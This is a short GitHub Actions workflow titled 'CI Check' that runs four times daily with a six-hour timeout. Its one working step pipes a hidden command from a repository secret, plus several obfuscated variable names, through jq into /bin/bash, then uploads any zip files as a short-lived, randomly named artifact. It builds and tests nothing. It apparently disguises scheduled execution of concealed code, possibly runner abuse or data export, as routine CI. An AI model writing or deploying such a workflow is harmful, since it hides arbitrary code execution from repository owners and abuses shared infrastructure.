name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '10 2,8,14,20 * * *'
jobs:
  task:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          w09: ${{ secrets.w09 }}
        run: |
          printf '%s' "$w09" | jq -r .f42 | /bin/bash
          printf '%s' "$stmc817" | jq -r .cunv604 | /bin/bash
          printf '%s' "$faybi15552" | jq -r .k6 | /bin/bash
          echo $vpveu706 | jq -r .fjjjc29 | /bin/bash
          printf '%s' "$pg74" | jq -r .pcgix46 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GblIsPcZ
          path: "*.zip"
          retention-days: 1
